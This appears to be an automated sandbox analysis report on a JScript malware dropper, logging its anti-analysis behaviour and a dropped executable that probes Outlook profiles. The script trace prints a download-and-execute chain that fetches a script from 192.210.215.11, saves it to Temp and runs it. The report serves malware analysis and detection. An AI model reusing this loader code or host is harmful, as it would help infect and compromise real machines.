Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles Jump to behavior

Data Obfuscation
barindex
JScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Shell");var oRUN = WshShell.Run(filepath);}}catch(e){}IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\2056.js.csv");ITextStream.WriteLine(" entry:1696 f:eval a0:%22try%7B%0Avar%20Object%20%3D%20new%20ActiveXObject(%22MSXML2.XMLHTTP%22)%3B%0AObject.Open(%22GET%22%2C%20%22http%3A%2F%2F192.210.215.11%2Fzoom%2Fmkl.js%22%2C%20false)%3B%0AObject.Send()%3B%0Avar%20fso%");IServerXMLHTTPRequest2.open("GET", "http://192.210.215.11/zoom/mkl.js", "false");IServerXMLHTTPRequest2.send();IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\2056.js.csv");ITextStream.WriteLine(" entry:1696 f:eval a0:%22try%7B%0Avar%20Object%20%3D%20new%20ActiveXObject(%22MSXML2.XMLHTTP%22)%3B%0AObject.Open(%22GET%22%2C%20%22http%3A%2F%2F192.210.215.11%2Fzoom%2Fmkl.js%22%2C%20false)%3B%0AObject.Send()%3B%0Avar%20fso%");IServerXMLHTTPRequest2.open("GET", "http://192.210.215.11/zoom/mkl.js", "false");IServerXMLHTTPRequest2.send();IFileSystem3.GetSpecialFolder("2");IFolder.Path();IServerXMLHTTPRequest2.status();_Stream.Open();_Stream.Type("1");IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.Position("0");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp/DNQUBU.js", "2");IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\2056.js.csv");ITextStream.WriteLine(" entry:1696 f:eval a0:%22try%7B%0Avar%20Object%20%3D%20new%20ActiveXObject(%22MSXML2.XMLHTTP%22)%3B%0AObject.Open(%22GET%22%2C%20%22http%3A%2F%2F192.210.215.11%2Fzoom%2Fmkl.js%22%2C%20false)%3B%0AObject.Send()%3B%0Avar%20fso%");IServerXMLHTTPRequest2.open("GET", "http://192.210.215.11/zoom/mkl.js", "false");IServerXMLHTTPRequest2.send();IFileSystem3.GetSpecialFolder("2");IFolder.Path();IServerXMLHTTPRequest2.status();_Stream.Open();_Stream.Type("1");IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.Position("0");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp/DNQUBU.js", "2");_Stream.Close();IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\2056.js.csv");ITextStream.WriteLine(" entry:1696 f:eval a0:%22try%7B%0Avar%20Object%20%3D%20new%20ActiveXObject(%22MSXML2.XMLHTTP%22)%3B%0AObject.Open(%22GET%22%2C%20%22http%3A%2F%2F192.210.215.11%2Fzoom%2Fmkl.js%22%2C%20false)%3B%0AObject.Send()%3B%0Avar%20fso%");IServerXMLHTTPRequest2.open("GET", "http://192.210.215.11/zoom/mkl.js", "false");IServerXMLHTTPRequest2.send();IFileSystem3.GetSpecialFolder("2");IFolder.Path();IServerXMLHTTPRequest2.status();_Stream.Open();_Stream.Type("1");IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.Position("0");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp/DNQUBU.js", "2");_Stream.Close();IWshShell3.Run("C:\Users\user\AppData\Local\Temp/DNQUBU.js")
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\tqxse.exe Jump to dropped file
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Memory allocated: F90000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Memory allocated: 29D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Memory allocated: 49D0000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1799973 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1799844 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1799735 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1799610 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1799485 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1799360 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1799235 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1799110 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1798985 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1798860 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1798735 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1798610 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1798485 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1798360 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1798235 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1798110 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1797985 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1797860 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1797735 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Window / User API: threadDelayed 8350 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Window / User API: threadDelayed 1491 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -30437127721620741s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -99874s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -99734s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -99624s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -99515s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -99406s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -99296s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -99187s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -99078s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -98968s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -98859s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -98750s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -98632s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -98523s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -98421s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -98312s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -98203s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -98093s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -97984s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -97875s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -97765s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -97656s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -97546s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -97437s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -97328s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -97218s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -97096s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -96968s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -96859s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -96749s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -96640s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -1799973s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -1799844s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -1799735s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -1799610s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -1799485s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -1799360s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -1799235s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -1799110s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -1798985s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -1798860s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -1798735s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -1798610s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -1798485s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -1798360s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -1798235s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -1798110s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -1797985s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -1797860s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe TID: 5532 Thread sleep time: -1797735s >= -30000s Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 100000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 99874 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 99734 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 99624 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 99515 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 99406 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 99296 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 99187 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 99078 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 98968 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 98859 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 98750 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 98632 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 98523 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 98421 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 98312 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 98203 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 98093 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 97984 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 97875 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 97765 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 97656 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 97546 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 97437 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 97328 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 97218 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 97096 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 96968 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 96859 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 96749 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 96640 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1799973 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1799844 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1799735 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1799610 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1799485 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1799360 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1799235 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1799110 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1798985 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1798860 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1798735 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1798610 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1798485 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1798360 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1798235 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1798110 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1797985 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1797860 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Thread delayed: delay time: 1797735 Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: wscript.exe, 00000000.00000002.2343392552.000001C247F30000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`4
Source: tqxse.exe, 00000005.00000002.3409718764.0000000000C51000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
Source: wscript.exe, 00000000.00000002.2343513793.000001C247F77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2340779454.000001C247F77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2343392552.000001C247F30000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tqxse.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: tqxse.exe.4.dr Jump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Network Connect: 192.210.215.11 80 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\DNQUBU.js" Jump to behavior
